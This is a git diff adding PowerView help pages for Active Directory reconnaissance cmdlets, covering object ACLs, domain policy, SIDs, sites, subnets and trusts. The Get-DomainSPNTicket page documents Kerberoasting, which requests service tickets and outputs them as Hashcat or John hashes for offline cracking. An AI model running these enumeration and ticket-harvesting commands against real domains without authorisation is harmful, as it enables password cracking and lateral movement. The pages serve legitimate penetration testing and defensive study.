+Returns the ACLs associated with a specific active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap + +## SYNTAX + +``` +Get-DomainObjectAcl [[-Identity] ] [-ResolveGUIDs] [-RightsFilter ] [-Domain ] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs +``` + +Get the ACLs for the matt.admin user in the testlab.local domain and +resolve relevant GUIDs to their display names. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs +``` + +Enumerate the ACL permissions for all OUs in the domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ResolveGUIDs +Switch. +Resolve GUIDs to their display names. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RightsFilter +A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Rights + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ACL + +Custom PSObject with ACL entries. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainPolicy.md b/docs/Recon/Get-DomainPolicy.md new file mode 100755 index 0000000..8b7d157 --- /dev/null +++ b/docs/Recon/Get-DomainPolicy.md @@ -0,0 +1,159 @@ +# Get-DomainPolicy + +## SYNOPSIS +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID + +## SYNTAX + +``` +Get-DomainPolicy [[-Domain] ] [-Source ] [-Server ] [-ServerTimeLimit ] + [-ResolveSids] [-Credential ] +``` + +## DESCRIPTION +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller using Get-DomainGPO. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainPolicy +``` + +Returns the domain policy for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainPolicy -Domain dev.testlab.local +``` + +Returns the domain policy for the dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainPolicy -Source DC -Domain dev.testlab.local +``` + +Returns the policy for the dev.testlab.local domain controller. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainPolicy -Credential $Cred + +## PARAMETERS + +### -Domain +The domain to query for default policies, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Source +Extract 'Domain' or 'DC' (domain controller) policies. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Domain +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResolveSids +Switch. +Resolve Sids from a DC policy to object names. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### Hashtable + +Ouputs a hashtable representing the parsed GptTmpl.inf file. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSID.md b/docs/Recon/Get-DomainSID.md new file mode 100755 index 0000000..16c51ce --- /dev/null +++ b/docs/Recon/Get-DomainSID.md @@ -0,0 +1,102 @@ +# Get-DomainSID + +## SYNOPSIS +Returns the SID for the current domain or the specified domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer + +## SYNTAX + +``` +Get-DomainSID [[-Domain] ] [[-Server] ] [[-Credential] ] +``` + +## DESCRIPTION +Returns the SID for the current domain or the specified domain by executing +Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192) +to search for domain controllers through LDAP. +The SID of the returned domain controller +is then extracted. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSID +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainSID -Domain testlab.local +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSID -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### String + +A string representing the specified domain SID. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSPNTicket.md b/docs/Recon/Get-DomainSPNTicket.md new file mode 100755 index 0000000..70385a4 --- /dev/null +++ b/docs/Recon/Get-DomainSPNTicket.md @@ -0,0 +1,136 @@ +# Get-DomainSPNTicket + +## SYNOPSIS +Request the kerberos ticket for a specified service principal name (SPN). + +Author: machosec, Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +### RawSPN (Default) +``` +Get-DomainSPNTicket [-SPN] [-OutputFormat ] [-Credential ] +``` + +### User +``` +Get-DomainSPNTicket [-User] [-OutputFormat ] [-Credential ] +``` + +## DESCRIPTION +This function will either take one/more SPN strings, or one/more PowerView.User objects +(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN +using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. +The encrypted +portion of the ticket is then extracted and output in either crackable John or Hashcat +format (deafult of John). + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSPNTicket -SPN "HTTP/web.testlab.local" +``` + +Request a kerberos service ticket for the specified SPN. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket +``` + +Request kerberos service tickets for all SPNs passed on the pipeline. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat +``` + +Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format. + +## PARAMETERS + +### -SPN +Specifies the service principal name to request the ticket for. + +```yaml +Type: String[] +Parameter Sets: RawSPN +Aliases: ServicePrincipalName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -User +Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for. + +```yaml +Type: Object[] +Parameter Sets: User +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -OutputFormat +Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. +Defaults to 'John'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Format + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote domain using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more SPN strings on the pipeline with the RawSPN parameter set. + +### PowerView.User + +Accepts one or more PowerView.User objects on the pipeline with the User parameter set. + +## OUTPUTS + +### PowerView.SPNTicket + +Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSite.md b/docs/Recon/Get-DomainSite.md new file mode 100755 index 0000000..caf7790 --- /dev/null +++ b/docs/Recon/Get-DomainSite.md @@ -0,0 +1,309 @@ +# Get-DomainSite + +## SYNOPSIS +Search for all sites or specific site objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainSite [[-Identity] ] [-GPLink ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties whencreated,usnchanged,...". +By default, all site objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSite +``` + +Returns the current sites in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainSite *admin* -Domain testlab.local +``` + +Returns all sites with "admin" in their name in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" +``` + +Returns all sites with linked to the specified group policy object. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSite -Credential $Cred + +## PARAMETERS + +### -Identity +An site name (e.g. +Test-Site), DistinguishedName (e.g. +CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or +GUID (e.g. +c37726ef-2b64-4524-b85b-6a9700c234dd). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -GPLink +Only return sites with the specified GUID in their gplink property. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: GUID + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Site + +Custom PSObject with translated site property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSubnet.md b/docs/Recon/Get-DomainSubnet.md new file mode 100755 index 0000000..8cd82b1 --- /dev/null +++ b/docs/Recon/Get-DomainSubnet.md @@ -0,0 +1,309 @@ +# Get-DomainSubnet + +## SYNOPSIS +Search for all subnets or specific subnets objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainSubnet [[-Identity] ] [-SiteName ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties whencreated,usnchanged,...". +By default, all subnet objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSubnet +``` + +Returns the current subnets in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainSubnet *admin* -Domain testlab.local +``` + +Returns all subnets with "admin" in their name in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" +``` + +Returns all subnets with linked to the specified group policy object. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSubnet -Credential $Cred + +## PARAMETERS + +### -Identity +An subnet name (e.g. +'192.168.50.0/24'), DistinguishedName (e.g. +'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'), +or GUID (e.g. +c37726ef-2b64-4524-b85b-6a9700c234dd). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SiteName +Only return subnets from the specified SiteName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Subnet + +Custom PSObject with translated subnet property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainTrust.md b/docs/Recon/Get-DomainTrust.md new file mode 100755 index 0000000..29af577 --- /dev/null +++ b/docs/Recon/Get-DomainTrust.md @@ -0,0 +1,250 @@ +# Get-DomainTrust + +## SYNOPSIS +{{Fill in the Synopsis}} + +## SYNTAX + +### NET (Default) +``` +Get-DomainTrust [[-Domain] ] [-FindOne] +``` + +### API +``` +Get-DomainTrust [[-Domain] ] [-API] [-Server ] [-FindOne] +``` + +### LDAP +``` +Get-DomainTrust [[-Domain] ] [-LDAP] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-FindOne] [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### Example 1 +``` +PS C:\> {{ Add example code here }} +``` + +{{ Add example description here }} + +## PARAMETERS + +### -API +{{Fill API Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: API +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +{{Fill Credential Description}} + +```yaml +Type: PSCredential +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +{{Fill Domain Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 0 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -FindOne +{{Fill FindOne Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAP +{{Fill LDAP Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +{{Fill LDAPFilter Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +{{Fill Properties Description}} + +```yaml +Type: String[] +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +{{Fill ResultPageSize Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +{{Fill SearchScope Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: +Accepted values: Base, OneLevel, Subtree + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +{{Fill Server Description}} + +```yaml +Type: String +Parameter Sets: API, LDAP +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +{{Fill ServerTimeLimit Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +{{Fill Tombstone Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### System.String + + +## OUTPUTS + +### PowerView.DomainTrust.NET +PowerView.DomainTrust.LDAP +PowerView.DomainTrust.API + + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainTrustMapping.md b/docs/Recon/Get-DomainTrustMapping.md new file mode 100755 index 0000000..692f265 --- /dev/null +++ b/docs/Recon/Get-DomainTrustMapping.md @@ -0,0 +1,220 @@ +# Get-DomainTrustMapping + +## SYNOPSIS +{{Fill in the Synopsis}} + +## SYNTAX + +### NET (Default) +``` +Get-DomainTrustMapping +``` + +### API +``` +Get-DomainTrustMapping [-API] [-Server ] +``` + +### LDAP +``` +Get-DomainTrustMapping [-LDAP] [-LDAPFilter ] [-Properties ] [-SearchBase ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### Example 1 +``` +PS C:\> {{ Add example code here }} +``` + +{{ Add example description here }} + +## PARAMETERS + +### -API +{{Fill API Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: API +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +{{Fill Credential Description}} + +```yaml +Type: PSCredential +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAP +{{Fill LDAP Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +{{Fill LDAPFilter Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +{{Fill Properties Description}} + +```yaml +Type: String[] +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +{{Fill ResultPageSize Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +{{Fill SearchScope Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: +Accepted values: Base, OneLevel, Subtree + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +{{Fill Server Description}} + +```yaml +Type: String +Parameter Sets: API, LDAP 